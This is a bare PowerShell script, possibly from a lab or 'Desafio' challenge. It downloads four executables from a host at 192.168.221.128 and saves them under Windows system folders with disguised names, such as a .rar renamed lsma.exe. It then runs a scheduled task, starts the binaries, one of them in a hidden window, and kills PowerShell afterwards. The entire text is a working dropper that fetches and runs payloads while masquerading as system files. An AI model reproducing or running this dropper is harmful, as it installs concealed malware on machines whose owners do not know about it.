$client = new-object System.Net.WebClient
$client.DownloadFile('http://192.168.221.128/Desafio/g.exe','c:\windows\help\get.exe')
$client.DownloadFile('http://192.168.221.128/Desafio/u.exe','c:\windows\inf\aspnet\u.exe')
$client.DownloadFile('http://192.168.221.128/Desafio/max.exe','c:\windows\inf\winnts.exe')
$client.DownloadFile('http://192.168.221.128/Desafio/1017.rar','c:\windows\inf\aspnet\lsma.exe')
schtasks /run /tn oka
cmd /c start c:\windows\inf\aspnet\lsma.exe
cmd /c start c:\windows\inf\winnts.exe
Start-Process -FilePath c:\windows\inf\aspnet\lsma.exe -NoNewWindow
Start-Process -FilePath c:\windows\inf\aspnet\u.exe -WindowStyle Hidden
cmd /c taskkill /f /im powershell.exe